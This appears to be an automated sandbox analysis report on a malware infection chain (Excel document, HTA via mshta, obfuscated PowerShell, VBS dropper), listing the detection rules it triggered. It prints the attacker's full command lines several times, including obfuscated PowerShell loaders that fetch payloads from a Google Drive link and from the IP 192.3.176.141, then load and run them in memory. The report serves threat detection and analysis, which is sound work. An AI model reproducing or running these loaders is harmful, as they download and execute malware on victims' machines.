        Process Memory Space: powershell.exe PID: 3560INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x2edb:$b2: ::FromBase64String(
        • 0x3d8c:$b2: ::FromBase64String(
        • 0x51f2:$b2: ::FromBase64String(
        • 0x5693:$b2: ::FromBase64String(
        • 0x5af6:$b2: ::FromBase64String(
        • 0x2533c:$b2: ::FromBase64String(
        • 0x25989:$b2: ::FromBase64String(
        • 0x2ca18:$b2: ::FromBase64String(
        • 0x2d1e9:$b2: ::FromBase64String(
        • 0x2d841:$b2: ::FromBase64String(
        • 0x2f29a:$b2: ::FromBase64String(
        • 0x2f8e7:$b2: ::FromBase64String(
        • 0x528cd:$b2: ::FromBase64String(
        • 0x52ef4:$b2: ::FromBase64String(
        • 0x60709:$b2: ::FromBase64String(
        • 0x60d57:$b2: ::FromBase64String(
        • 0x61f07:$b2: ::FromBase64String(
        • 0x6671d:$b2: ::FromBase64String(
        • 0x6f928:$b2: ::FromBase64String(
        • 0x3b55:$b3: ::UTF8.GetString(
        • 0x4fef:$b3: ::UTF8.GetString(

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2Fy
        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3208, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingstobegoodwithhislifebestthigns[1].hta
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0T
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0T
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , ProcessId: 3864, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2Fy
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgI
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3208, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3484, ProcessName: mshta.exe
